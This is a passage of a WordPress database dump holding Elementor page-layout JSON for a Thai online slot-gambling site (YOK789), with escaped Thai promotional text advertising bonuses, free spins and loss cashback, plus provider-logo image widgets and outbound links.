\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2562,340,'_thumbnail_id','280'),(2566,341,'_elementor_edit_mode','builder'),(2567,341,'_elementor_template_type','wp-page'),(2568,341,'_elementor_version','3.35.5'),(2569,341,'_elementor_pro_version','3.32.3'),(2570,341,'_wp_page_template','default'),(2571,341,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2572,341,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Demo-play-slot-Banner-Yok789.webp\",\"id\":280,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 YOK789 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e19\\u0e40\\u0e2d\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG.webp\",\"id\":287,\"size\":\"\",\"alt\":\"PG\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming.webp\",\"id\":286,\"size\":\"\",\"alt\":\"Microgaming\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI.webp\",\"id\":291,\"size\":\"\",\"alt\":\"JILI\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo.webp\",\"id\":285,\"size\":\"\",\"alt\":\"Slot xo\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic.webp\",\"id\":284,\"size\":\"\",\"alt\":\"pragmatic\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2573,341,'_thumbnail_id','280'),(2579,342,'_elementor_edit_mode','builder'),(2580,342,'_elementor_template_type','wp-page'),(2581,342,'_elementor_version','3.35.5'),(2582,342,'_elementor_pro_version','3.32.3'),(2583,342,'_wp_page_template','default'),(2584,342,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2585,342,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 YOK789 